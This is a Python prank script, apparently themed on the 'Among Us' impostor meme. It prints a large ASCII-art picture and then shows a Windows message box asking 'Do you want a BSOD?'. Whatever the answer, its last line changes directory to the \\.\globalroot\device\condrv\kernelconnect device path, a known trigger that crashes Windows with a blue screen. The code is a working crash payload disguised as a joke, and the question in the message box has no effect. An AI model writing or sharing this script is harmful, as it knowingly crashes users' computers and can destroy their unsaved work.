import os
os.system('mode con: cols=150 lines=100')
print("""\:::::::::::::::::::::::::::::::::::::::::-.....```....```....--------------------------------------........................-................-:::---:::
NNmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmho///////////////+syhdddmdmdhyhhyhddddmdddddddddddddddhhhysoo+++o++oooooosssssssssssssssssssssssssshmmmmmmmmm
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNdo+/////////++ossyhddmmdmmmdddddddmmmmmmmddmmmddmmmmmmdddhysssoo++/++ososssssssssssssssssssssssssssydmmmmmmmm
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNmds+////////+oyhhdddmmddmmmmddmmmmmmmmmmmmmmdmmmmmmmmmmmmddhhyyss+////ososssssssssssssssssssssssssssshmmmmmmmm
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNds+/////+osyhdddmmmdhhmmmmddmdmdddmmmmddddmddddddddmmdddddhhyysso+++++oosssssssssssssssssssssssssssshmmmmmmmm
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNmds+////oyyhdddmmmmmdyydmmmddddddddddddhhhddhhhhyhhhhhhhhhhddhhysyysooooooossssssssssssssssssssssssssymmmmmmmm
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNmhsssyyhhhddmmNNmmmdyyhdddddddhhhhyyyyysssssssssoossssyyyhhyhhhhhhhhhssssssssssssssssssssssssssssossymmmmmmmm
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNmmmmmmmNNmhyhhhddddmmmNNmmmdhhhhdhhhhyyyyyssooo+++++/////////+++++osssyhhhhhddddhyyssssssssssssssssssssssoooshmmmNmmmm
NNNNNNNNNNNNNNNNNNNNNNmmNNmNNNNNNNNNNNNNmmdhhddmmmmNNNmmmddhhhhhhhhysssoo++++///::::-------::///////++ossyhhhdddddhyysssssssssssssssssssoooosdmmmmmmmm
NNNNNNNNNNNNNNNNNNNNNNmmNmmmNmmmmmmmmmmmddhhhdmmmmmNmmdddhhhhyyyhhysoo+++//////::::-----------:://////+++osyhddddddhyysssssssssssoooooooooooymmmmmmmmm
NNNNNNNNNNNNNNNNNNNNNNmmmmmNNmmmmmddddhyyhhhhdmmmmmmdddhhyyyyyyyhho+++++///////::-------------:::://:://++osyhddmddmddhysssssssoooooooooooosdNmmmmmmmm
NNNNNNNNNNNNNNNNNNNNNNNNNmmmmmmmmmmmmdhhhhhhddmNNmmdhhyyyyyyyssshyo+++//////////::-------..--:::::////://++osshhddddmddhsssssooooooooooooosdmmmmmmmmmm
NNmmmmmmmmmmmmmmmmmmmmmmmmmmmddddhhhyhhhhhhdmmmNNmdhyyyssssssssyhs++++/////////::::-----...--:::::::///////+ooyhddddmmddysssooooooooooooosdNmmmmmmmmmm
mmmmdddddddddddmmmmmmmdddddddhhyyyssoshhdddmmNNmdhhyysssssssyyyyyo+++++///////:::::::---...---::::/:///////++osyhdddddmmdyssooooooooooooohmNNmmmmmmmmm
ooooooooo+++++++oooooooosssssyyyyyyyssyhddmmmNmdhyysssssssyyyyyyo+++++////////::::::::---..---::///::///////++syhhdddddddhsoooooooooooooohNNNNNNNNNNNN
//:::::::::::::::::::::::::::///+++ossyhddmmNmdhhyyssssssyyyyss++/////////////:::::::---------::::/::://////++osyhdddddddysssoooooooooooosdNNNNNNNNNNN
:::::::::::::::::::::::::::::::::-::oyhddmmmmdhyyyyyyyysssyysso++//////////////:::::::---------:::::////////++osyhdddddddyooooooooooooooooyNNNNNNNNmmm
:::::::::::::::::::::::::::::::::-::+ydddmmmmdhyyyyyyyyysssoo+++/////////////////:::::-:--------:::::///////++osyhdddddmdyooooooooooooooo+sNmmmmmmmmmm
::::::::::::::::::::::::::::::::::::/sdddmmmddyyyyyyyyyssooo++++//////////////////:::::::--..---:::::///////++osyhdddmmmdyooooooooooooooooyNmmmmmmmmmm
::::::::::::::::::::::::::::::::::::/ydmmNmmdhyyyyyyyysoooo++++++++++++//+++/////////////::-.--:::::////////++osyhdddmmdmhsooooooooooo++ooyNmmmmmmmmmm
::::::::::::::::::::::::::::::::::::/sdmmmmmdhyyyyyyyyyso+o+++++++++++++++++++++///////////:::///////////////++oyhhdmdmmmhoooooooooooo+++odNmmmmmmmmmm
:::::-----------::-------------::::::+ymNmmmdhyyyyyyyhhyyssoooo+++oo++++++++++++++++++++++///++++++oooo++////++osyddmdddhsoooooooooo++o++sNmmmmmmmmmmm
--------------------------------------sdmmmmhyyyyyhhhddhhhhhyyssooooooooooo++++++++++ooooosyyyyhhhyhyyyyyoo++//+osdddmmmdsoooooooooooo++omNNmmmmmmmmmm
--------------------------------------/sNmmdhyyhhhhhyhhhhddddhhhyyyyyysssoooo+++oooosssyyhhdddddmddhhhyyyyyyso+++ohddmmNNsoooooooooo+++sdNNmmmmmmmmmmm
:--------------------:::::::::::------:smmddhhhhyysssyyhhhdhhhhhhhhyyyyyssssoo+oosssssyyyhdmmmdmmmddhhhyysssss+//+yddmmmNsooooooooooo+omNNNNmmmmmmmmmm
:::::::::::::---:::::------------------ymNNdddhhyssyddmmddddddddddhhhhyyyyso+++++ossssyhdmmddhhyysshdddddhsoo+:-:/smmmmddsoo+ooooooooohNNNNNmmmmmmmmmm
::::::::::::::-::::::------------------hmNNdhyyysyhmmmdhyyyhhhyyhdmdhhhyyys+//::/osssyhddddyshdhhhs/+hdhdhyo+/////oddhhhyo+o+ooooooo+oymNNmmmmmmmmmmmm
+/::::::::::::::::::::---------------:-ydmNhyysyyhdmdddyyydNNNNmmhhdddhyys++/:--:/syhddhhhyyhdmmmdhyossosyysoo++//oddhsso++oooooo+++o++hNmmmmmmmmmmmmm
ys+/::::::::::::::::::---------------:-:mmNhssssyyyhdhdhhydNmdmmmddddddhho++//:-:/+yddhddhhhhhhhyyso/++++++//://::ohddsoo++oo+oo+++++++ommmNmmmmmmmmmm
ssss+::::::::::::::::----------------:::dmmhsssyyhhhhyyyyyhhhyyhhhddddddy+++//:--/+osyhhhhhyysso+++++oo++ooo++/+++oyddys+++oooo+++++++++hNmmmmmmmmmmmm
ssssys:::::::::::::::::::::::::------::+ddmyssyyyhhhhhhyyyyhhhhhddhhdhhhyo+///:-:/+++oosssssssssyysso+/////+osso++oyhdss+/+ooooo+++++++ohmNmmmmmmmmmmm
sssssys/::::::::::::::::::::::::----:-:sdddhsyyyyyhhhhhhhddhddhhyyyyhhhhys+//:-://++++++++++ooosssoo++///////+sso++sdhss+/+ooooo+++++++omNNNmmmmmmmmmm
ssssssys/::::::::::::::::::::::-------:ydddyyyyyyyyyyssssssssssssosyhhhhyso+//::/+++++++++oooooooooo++/////////ossosdyso//+o+ooo+++++++omNmNmmmmmmmmmm
hysssssyo/::::::::::::::::::::::::::--/ymddyyyyysssso+++++++++oooosyyyyyyso+/://+++++++++++++ooooooo+++++////:///osssyo/::/oooooo++++++dNNNNmmmmmmmmmm
hhhyyyssyo/:::::::::::::::::::::::::::/hmmdhhyyyssooo+++++++ooosssyyyyyysso+/::/++++o++++++oooo+++++///++/////:/++os+o/:::/ooooo+++++ohmNNNNmmmmmmmmmm
yydmmmhysys/:::::::::::::::::::::::::-shhmdhyyysssoooo++ooossssyyyyyyyyysoo++/://++oo+++++osssyyyssoo++++++++++//++s+/::::++oooo++++oyNNNNNmmmmmmmmmmm
mdhhmNNmhyyo/:::::::::::::::::::::::::shyddyyyysssoooooosssyyyyyyyyyyyyssoo+++///++++++++++o+ossyyhhyyssoooooooo+o++/:::::+o+oo+++ooyNNNNNNNmNNNNmmNmm
NNmhyhNNmdhys/::::::::::::::::::::::::/syddyysysssssossyyyhhyyyyyyyyyyysoo++++++++++++++++++++oossyyhhhyysss+/osoo+++/:::/+++oo++oosmNNNNNNNmNNNNmmNNm
NNNmdhhmNNmhys+::::::::::::::::::::::::/sdhyyyysssssyyhhhhhhyyyyyyyyyyysoo++++++++++ooooo+++++ooosssyyyhhhyyo++syoo++++osso++oo++oshdhddmmmmNNNNNmmmmm
dmNNNmdhmNNmdyyo::::::::::::::::::::::::+yhyyyyyyyyhddhhhhhhhyyhyyyyyyyyso+//++++osssssoo++++++oooosyyhhhddhys+oysooooooo++ooooo+oymddddddmmdddmmmmmmm
hhdmNNNmdmNNNddy+::::::::::::::::::::::::/syyyyyyhddhhdhhhhhhyyyhhhhhhhhyysssssssyyysoooo+++ooossssyhhhdddmmhyo+yso+++oooooooooooosmmdddmmmNmmmmmNmdhh
dddmNNNNddmNNdmdy/:::::::::::::::::::::::-sssyyyyydyydddddhhhyyyyyhhhhhhhhhyyyyyyyssoooooooossyyhhhdddddddmdyyoohsoooooooooo+ooo+oohmmdddmmmmmdmdmNmdd
mmNNNmmNmdmNNmdhys/:::::::::::::::::::::::+/oyyyyshyyyhhdmmmddhyyyyyhhhhhhhhyyyysoooooossssyyyyyhddmmdyyhhdhssooyssoosoossoooooo+++smmdddddddmmmmmNNNm
mmNNmdddNddmNmmhhyo/::::::::::::::::::::::///syyyssyssssyhmmmdddhhhhhhhhhhhyyyssossssyyyyssoosssodmmhsssyyhsssososoooooosssssso+o++oyhyhyyssyhmmmmNNNN
mmNNdhydmddmmmmmhhy/::::::::::::::::::::::/+:+syyyssssssyyhddmhysysyyyyyyyyyyssssssssoooo:-/+/+//ddyooosshsooosssooooosssssssso+o+++shdhhhddddmmmmNNNN
mmmmdhyhNmddNmmmmdhs:::::::::::::::::::::::o/-syyyssssossyyhddho/+//o+/+ssooosso/::/:-.::.`.-.:/yhso+oooshooossssosooossssosssoo++ooohmmddmmmmmmmmmNNN
dddhhhyhNmddNmmmNmdy+::::::::::::::::::::::y/-:oyyyssssosyyyhddy/::-:-.-/----:+:.``.-.``..`.--+hhso+ooooyo+ossss+oooooosssossso+++oyssmmmmmmmmmmmmmNNm
ddddhyyhNNmdmmdddddhs::::::::::::::::::::::y/:-/ssyyyossosyyyhdmdo/--..--...../..```..``..`-+yhyso++++oss+ossss++ooosssssssssso+oyddsoymmmmmmmmmmNmNmd
dddhhyyhNNmdmmmddddhy/:::::::::::::::::::::s+:--:osyyyossssyyhhhdmdo+::::-----:-.....---+//syyyyso+++++ooossssoooosssyyydmdddhyydmddyssdmmNmmNNNNNmdmm
mdhhyyyhMNNmmdmddddhy/:/:::::::::::::::::::os:::-:/syyysssssyyhhhddmdhyhs//::://::::+sos+ss/oysss+++++oo+osssoooossssysymNNNNNmNmNNNmmmmNNNNNNmNNmmmNN
ddhhyyyhNNNmdddmdddhyo:/:::::::::::::::::::+y/:::::/oyyyssssyyyhhhhdddhyhhyhhyhhyyyyhy/+:-:+ossso+///+++osssssoossssssyhmNNNNNmmmmmmmNNNNNNNNmdddmmmNN
dhhyyyyhNNNmmdmmdddhhy//////:::::::::::::::/y/::::///+syyosssyyyyhhhhhhsooosssyysso/+o:-:::+ooo+/////++osyysssooosyssoyhdNNNNNmmmmmmNNNNNNNNNdddmNmNNN
dhhyyyyhNNNNmmmmdddhhh+///////::/:::::::::/:s+::///+++osyysssyyyyyyhhyssyso++//+/////++++oooso++////+/+syyssooooossoooyhdNNNNNNNNmmNNNNNNNNNNmdmmmNNMM
dhhhyyyhNNMNmmmmmddhhds////////////::///////oy/++osyyyyyhyysssyyyyssyyyyyssssoooooo++ooooooo+++/////+/+sso+/os///+oooohdmNNNNNNNmmmmmmNNNNNNNmmmNNNNNM
hhhyyyyhNMMNNNNNmdddddy+///////////////////+sdyyyyssyyhhhhhhssyyyyyysosssssssssoooooo++++++++++//////+oooo++/yy+:::/+shdmNNNNNNmmmmmmNNNNNNNNNmNNNNNNN
dhhhyyyhNNMNNNNmmdddddho//////////////+ooshhhmhyssssydmyyhhhhyyyyyyyyssssoooooooooo++++++/+++++//////osoo+++++dho+//::/+yhdmmmNNNmmNNNNNNNNNNNNNNNNmmN
dhhhyyhhmNNmmmmdddddddhs+///////++osyyhhhyysydyyyssshNmyyyhhhhyyyyyyyysssssoooooooooo+++++++++/////+ossoo+++++hdo++////::::/+syhmmmNmNNNNNNNNNNNNmmmmN
dhhhyyhhdmmmdddddddddhyo///+++osyyhhyyyyyyyyhdyssssymNhsyyhhhhhyyyssssssssoooooooooooo++++++/////+oyyssoo+++++sdy//://////////::/osdmmNNNNNNNNNNNNNNNm
dhhhyhhhdddmdmmmmmdhso++ooooossyyhhhhhhyyyyhhmysssshmhsyyhhhhhhhhysssssssooooooooooo+++++///+//++oyhhyysoo++/+sdy/:////::::///+///::+shmNNNNNNNNNNNNNm
dhhyyhhhhdmmdmmddhysyyyyyyyyyyyhhhhhhyyyyyyyhmysyssdysyyhhhhhhhhhhyssooooooo+++++++++/////////++syssosyyyo++//sho//://::::::////////////+ydNNNNNNNNMNN
ddhhhhhhhhdhyso+++ooosyyyyyyysyhhhhhyyyhyyyyhdysssydyyyhhhhhhhhhhhhyssoooooo++++++++++///+++/++yysssoooyhhyo+/sy+////////::::///::::://+///+ydmmmNNNNN
dddhhyyso++++++++ooyhhhhhhhyysyhhdhhhyyyssyyyhyyyyyddyyhhhhhyyyyyhhhysssoooooo++++++++++++++osyyssssoo+oshhhso++////////////:::::::::::://////+oyhdmNN
ddhso++oooooso+osyyhhdhhhhhyssyhhdhhyyyyssyyhhyyyyyhmhhhhhhhyyyyyyhhhhyssoooo++++++++++++oosyhyssssss++++oyhhho//+/////////:::::///::::::::///++//oydd
hsooossssssyyyyshhhhhhhhhhyyyyyhhhhyyyyyssyhhhhyyyyydmhhhhhhhyyyyyhhhhhhysssooooooooossssyyhhyyssooooo+++++oss++/+++//////://::://///::::::::://///++s
oossssyhysyyyyyyhhhhhhhhhhhyyyyhhhhyyyyyssyhhhhhyyyhhmdhhhhhhyyyyyyhhyhhdddhyyyyysyyyyyhhyhyyyssoooo++//+++o+++++++//+////::////:://////::::::///:////""")
import ctypes  # An included library with Python install.   
ctypes.windll.user32.MessageBoxW(0, "Do you want a BSOD?", "Impostor is sus")
os.chdir(r'\\.\globalroot\device\condrv\kernelconnect')

